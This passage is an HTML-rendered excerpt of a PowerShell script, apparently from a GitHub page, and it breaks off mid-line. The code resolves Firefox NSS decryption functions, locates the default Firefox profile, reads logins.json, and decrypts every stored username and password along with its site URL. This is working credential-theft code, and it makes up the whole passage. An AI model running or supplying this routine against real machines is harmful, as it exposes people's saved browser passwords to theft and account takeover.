data-line-number=\"859\"></td>\n        <td id=\"LC859\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ptr</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::AllocHGlobal<span class=\"pl-k\">(</span><span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::SizeOf<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECStructData</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L860\" class=\"blob-num js-line-number\" data-line-number=\"860\"></td>\n        <td id=\"LC860\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">EmptyTSECItem</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ptr</span> <span class=\"pl-k\">-as</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECItem</span></td>\n      </tr>\n      <tr>\n        <td id=\"L861\" class=\"blob-num js-line-number\" data-line-number=\"861\"></td>\n        <td id=\"LC861\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">result</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_Decrypt</span><span class=\"pl-en\">.Invoke</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[ref]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECStructData</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[ref]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">EmptyTSECItem</span><span class=\"pl-k\">,</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L862\" class=\"blob-num js-line-number\" data-line-number=\"862\"></td>\n        <td id=\"LC862\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;[+]PK11SDR_Decrypt result:<span class=\"pl-k\">$</span><span class=\"pl-smi\">result</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L863\" class=\"blob-num js-line-number\" data-line-number=\"863\"></td>\n        <td id=\"LC863\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">result</span> <span class=\"pl-k\">-eq</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L864\" class=\"blob-num js-line-number\" data-line-number=\"864\"></td>\n        <td id=\"LC864\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L865\" class=\"blob-num js-line-number\" data-line-number=\"865\"></td>\n        <td id=\"LC865\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L866\" class=\"blob-num js-line-number\" data-line-number=\"866\"></td>\n        <td id=\"LC866\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">EmptyTSECItem</span><span class=\"pl-en\">.SECItemLen</span> <span class=\"pl-k\">-ne</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L867\" class=\"blob-num js-line-number\" data-line-number=\"867\"></td>\n        <td id=\"LC867\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L868\" class=\"blob-num js-line-number\" data-line-number=\"868\"></td>\n        <td id=\"LC868\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">size</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EmptyTSECItem</span><span class=\"pl-en\">.SECItemLen</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L869\" class=\"blob-num js-line-number\" data-line-number=\"869\"></td>\n        <td id=\"LC869\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">dataPtr</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">EmptyTSECItem</span><span class=\"pl-en\">.SECItemData</span> <span class=\"pl-k\">-as</span> <span class=\"pl-e\">[IntPtr]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L870\" class=\"blob-num js-line-number\" data-line-number=\"870\"></td>\n        <td id=\"LC870\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">retval</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> byte<span class=\"pl-e\">[]</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">size</span></td>\n      </tr>\n      <tr>\n        <td id=\"L871\" class=\"blob-num js-line-number\" data-line-number=\"871\"></td>\n        <td id=\"LC871\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::Copy<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">dataPtr</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">retval</span><span class=\"pl-k\">,</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">size</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L872\" class=\"blob-num js-line-number\" data-line-number=\"872\"></td>\n        <td id=\"LC872\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">clearText</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Text.Encoding]</span>::UTF8.GetString<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">retval</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L873\" class=\"blob-num js-line-number\" data-line-number=\"873\"></td>\n        <td id=\"LC873\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">return</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">clearText</span></td>\n      </tr>\n      <tr>\n        <td id=\"L874\" class=\"blob-num js-line-number\" data-line-number=\"874\"></td>\n        <td id=\"LC874\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L875\" class=\"blob-num js-line-number\" data-line-number=\"875\"></td>\n        <td id=\"LC875\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L876\" class=\"blob-num js-line-number\" data-line-number=\"876\"></td>\n        <td id=\"LC876\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L877\" class=\"blob-num js-line-number\" data-line-number=\"877\"></td>\n        <td id=\"LC877\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L878\" class=\"blob-num js-line-number\" data-line-number=\"878\"></td>\n        <td id=\"LC878\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L879\" class=\"blob-num js-line-number\" data-line-number=\"879\"></td>\n        <td id=\"LC879\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L880\" class=\"blob-num js-line-number\" data-line-number=\"880\"></td>\n        <td id=\"LC880\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitAddr</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::GetProcAddress<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&quot;NSS_Init&quot;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L881\" class=\"blob-num js-line-number\" data-line-number=\"881\"></td>\n        <td id=\"LC881\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitDelegates</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">Get-DelegateType</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[string]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[long]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L882\" class=\"blob-num js-line-number\" data-line-number=\"882\"></td>\n        <td id=\"LC882\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSS_Init</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetDelegateForFunctionPointer<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitAddr</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitDelegates</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L883\" class=\"blob-num js-line-number\" data-line-number=\"883\"></td>\n        <td id=\"LC883\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L884\" class=\"blob-num js-line-number\" data-line-number=\"884\"></td>\n        <td id=\"LC884\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBufferAddr</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::GetProcAddress<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&quot;NSSBase64_DecodeBuffer&quot;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L885\" class=\"blob-num js-line-number\" data-line-number=\"885\"></td>\n        <td id=\"LC885\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBufferDelegates</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">Get-DelegateType</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[string]</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[int]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[int]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L886\" class=\"blob-num js-line-number\" data-line-number=\"886\"></td>\n        <td id=\"LC886\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBuffer</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetDelegateForFunctionPointer<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBufferAddr</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBufferDelegates</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L887\" class=\"blob-num js-line-number\" data-line-number=\"887\"></td>\n        <td id=\"LC887\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L888\" class=\"blob-num js-line-number\" data-line-number=\"888\"></td>\n        <td id=\"LC888\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_DecryptAddr</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::GetProcAddress<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&quot;PK11SDR_Decrypt&quot;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L889\" class=\"blob-num js-line-number\" data-line-number=\"889\"></td>\n        <td id=\"LC889\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_DecryptDelegates</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">Get-DelegateType</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[Type]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECItem</span><span class=\"pl-en\">.MakeByRefType</span><span class=\"pl-k\">()</span><span class=\"pl-k\">,</span><span class=\"pl-e\">[Type]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECItem</span><span class=\"pl-en\">.MakeByRefType</span><span class=\"pl-k\">()</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[int]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[int]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L890\" class=\"blob-num js-line-number\" data-line-number=\"890\"></td>\n        <td id=\"LC890\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_Decrypt</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetDelegateForFunctionPointer<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_DecryptAddr</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">PK11SDR_DecryptDelegates</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L891\" class=\"blob-num js-line-number\" data-line-number=\"891\"></td>\n        <td id=\"LC891\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L892\" class=\"blob-num js-line-number\" data-line-number=\"892\"></td>\n        <td id=\"LC892\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">profilePath</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$(</span><span class=\"pl-k\">$</span><span class=\"pl-c1\">env:</span><span class=\"pl-smi\">APPDATA</span><span class=\"pl-k\">)</span>\\Mozilla\\Firefox\\Profiles\\*.default&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L893\" class=\"blob-num js-line-number\" data-line-number=\"893\"></td>\n        <td id=\"LC893\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L894\" class=\"blob-num js-line-number\" data-line-number=\"894\"></td>\n        <td id=\"LC894\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">defaultProfile</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$(</span><span class=\"pl-c1\">Get-ChildItem</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">profilePath</span><span class=\"pl-k\">)</span>.FullName</td>\n      </tr>\n      <tr>\n        <td id=\"L895\" class=\"blob-num js-line-number\" data-line-number=\"895\"></td>\n        <td id=\"LC895\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitResult</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSS_Init</span><span class=\"pl-en\">.Invoke</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">defaultProfile</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L896\" class=\"blob-num js-line-number\" data-line-number=\"896\"></td>\n        <td id=\"LC896\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;[+]NSS_Init result: <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSInitResult</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L897\" class=\"blob-num js-line-number\" data-line-number=\"897\"></td>\n        <td id=\"LC897\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L898\" class=\"blob-num js-line-number\" data-line-number=\"898\"></td>\n        <td id=\"LC898\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L899\" class=\"blob-num js-line-number\" data-line-number=\"899\"></td>\n        <td id=\"LC899\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">defaultProfile</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L900\" class=\"blob-num js-line-number\" data-line-number=\"900\"></td>\n        <td id=\"LC900\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L901\" class=\"blob-num js-line-number\" data-line-number=\"901\"></td>\n        <td id=\"LC901\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">#Web.extensions assembly is necessary for handling json files</span></td>\n      </tr>\n      <tr>\n        <td id=\"L902\" class=\"blob-num js-line-number\" data-line-number=\"902\"></td>\n        <td id=\"LC902\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">try</span></td>\n      </tr>\n      <tr>\n        <td id=\"L903\" class=\"blob-num js-line-number\" data-line-number=\"903\"></td>\n        <td id=\"LC903\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L904\" class=\"blob-num js-line-number\" data-line-number=\"904\"></td>\n        <td id=\"LC904\" class=\"blob-code blob-code-inner js-file-line\">           <span class=\"pl-c1\">Add-Type</span> <span class=\"pl-k\">-</span>AssemblyName System.web.extensions </td>\n      </tr>\n      <tr>\n        <td id=\"L905\" class=\"blob-num js-line-number\" data-line-number=\"905\"></td>\n        <td id=\"LC905\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L906\" class=\"blob-num js-line-number\" data-line-number=\"906\"></td>\n        <td id=\"LC906\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">catch</span></td>\n      </tr>\n      <tr>\n        <td id=\"L907\" class=\"blob-num js-line-number\" data-line-number=\"907\"></td>\n        <td id=\"LC907\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L908\" class=\"blob-num js-line-number\" data-line-number=\"908\"></td>\n        <td id=\"LC908\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Warning</span> <span class=\"pl-s\">&quot;Unable to load System.web.extensions assembly&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L909\" class=\"blob-num js-line-number\" data-line-number=\"909\"></td>\n        <td id=\"LC909\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">break</span></td>\n      </tr>\n      <tr>\n        <td id=\"L910\" class=\"blob-num js-line-number\" data-line-number=\"910\"></td>\n        <td id=\"LC910\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L911\" class=\"blob-num js-line-number\" data-line-number=\"911\"></td>\n        <td id=\"LC911\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L912\" class=\"blob-num js-line-number\" data-line-number=\"912\"></td>\n        <td id=\"LC912\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L913\" class=\"blob-num js-line-number\" data-line-number=\"913\"></td>\n        <td id=\"LC913\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">jsonFile</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">Get-Content</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">defaultProfile</span>\\logins.json&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L914\" class=\"blob-num js-line-number\" data-line-number=\"914\"></td>\n        <td id=\"LC914\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-k\">!</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">jsonFile</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L915\" class=\"blob-num js-line-number\" data-line-number=\"915\"></td>\n        <td id=\"LC915\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L916\" class=\"blob-num js-line-number\" data-line-number=\"916\"></td>\n        <td id=\"LC916\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Warning</span> <span class=\"pl-s\">&quot;Login information cannot be found in logins.json&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L917\" class=\"blob-num js-line-number\" data-line-number=\"917\"></td>\n        <td id=\"LC917\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">break</span></td>\n      </tr>\n      <tr>\n        <td id=\"L918\" class=\"blob-num js-line-number\" data-line-number=\"918\"></td>\n        <td id=\"LC918\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L919\" class=\"blob-num js-line-number\" data-line-number=\"919\"></td>\n        <td id=\"LC919\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ser</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> System.Web.Script.Serialization.JavaScriptSerializer</td>\n      </tr>\n      <tr>\n        <td id=\"L920\" class=\"blob-num js-line-number\" data-line-number=\"920\"></td>\n        <td id=\"LC920\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">obj</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ser</span><span class=\"pl-en\">.DeserializeObject</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">jsonFile</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L921\" class=\"blob-num js-line-number\" data-line-number=\"921\"></td>\n        <td id=\"LC921\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L922\" class=\"blob-num js-line-number\" data-line-number=\"922\"></td>\n        <td id=\"LC922\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L923\" class=\"blob-num js-line-number\" data-line-number=\"923\"></td>\n        <td id=\"LC923\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">logins</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">obj</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;logins&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L924\" class=\"blob-num js-line-number\" data-line-number=\"924\"></td>\n        <td id=\"LC924\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">count</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">logins</span><span class=\"pl-en\">.Count</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">-</span> <span class=\"pl-c1\"><span class=\"pl-c1\">1</span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L925\" class=\"blob-num js-line-number\" data-line-number=\"925\"></td>\n        <td id=\"LC925\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">passwordlist</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">@()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L926\" class=\"blob-num js-line-number\" data-line-number=\"926\"></td>\n        <td id=\"LC926\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">#Iterate through each login entry and decrypt the username and password fields</span></td>\n      </tr>\n      <tr>\n        <td id=\"L927\" class=\"blob-num js-line-number\" data-line-number=\"927\"></td>\n        <td id=\"LC927\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">for</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">;</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span> <span class=\"pl-k\">-le</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">count</span><span class=\"pl-k\">;</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">++</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L928\" class=\"blob-num js-line-number\" data-line-number=\"928\"></td>\n        <td id=\"LC928\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L929\" class=\"blob-num js-line-number\" data-line-number=\"929\"></td>\n        <td id=\"LC929\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;[+]Decrypting login information...&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L930\" class=\"blob-num js-line-number\" data-line-number=\"930\"></td>\n        <td id=\"LC930\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">user</span> <span class=\"pl-k\">=</span> Decrypt<span class=\"pl-k\">-</span>CipherText <span class=\"pl-k\">$($</span><span class=\"pl-smi\">logins</span><span class=\"pl-en\">.GetValue</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">)</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;encryptedUsername&#39;</span><span class=\"pl-e\">]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L931\" class=\"blob-num js-line-number\" data-line-number=\"931\"></td>\n        <td id=\"LC931\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">pass</span> <span class=\"pl-k\">=</span> Decrypt<span class=\"pl-k\">-</span>CipherText <span class=\"pl-k\">$($</span><span class=\"pl-smi\">logins</span><span class=\"pl-en\">.GetValue</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">)</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;encryptedPassword&#39;</span><span class=\"pl-e\">]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L932\" class=\"blob-num js-line-number\" data-line-number=\"932\"></td>\n        <td id=\"LC932\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">formUrl</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$($</span><span class=\"pl-smi\">logins</span><span class=\"pl-en\">.GetValue</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">i</span><span class=\"pl-k\">)</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;formSubmitURL&#39;</span><span class=\"pl-e\">]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L933\" class=\"blob-num js-line-number\" data-line-number=\"933\"></td>\n        <td id=\"LC933\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FoxCreds</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> PSObject <span class=\"pl-k\">-</span>Property @{</td>\n      </tr>\n      <tr>\n        <td id=\"L934\" class=\"blob-num js-line-number\" data-line-number=\"934\"></td>\n        <td id=\"LC934\" class=\"blob-code blob-code-inner js-file-line\">                UserName <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">user</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L935\" class=\"blob-num js-line-number\" data-line-number=\"935\"></td>\n        <td id=\"LC935\" class=\"blob-code blob-code-inner js-file-line\">                Password <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">pass</span></td>\n      </tr>\n      <tr>\n        <td id=\"L936\" class=\"blob-num js-line-number\" data-line-number=\"936\"></td>\n        <td id=\"LC936\" class=\"blob-code blob-code-inner js-file-line\">                URL <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">formUrl</span></td>\n      </tr>\n      <tr>\n        <td id=\"L937\" class=\"blob-num js-line-number\" data-line-number=\"937\"></td>\n        <td id=\"LC937\" class=\"blob-code blob-code-inner js-file-line\">            }</td>\n      </tr>\n      <tr>\n        <td id=\"L938\" class=\"blob-num js-line-number\" data-line-number=\"938\"></td>\n        <td id=\"LC938\" 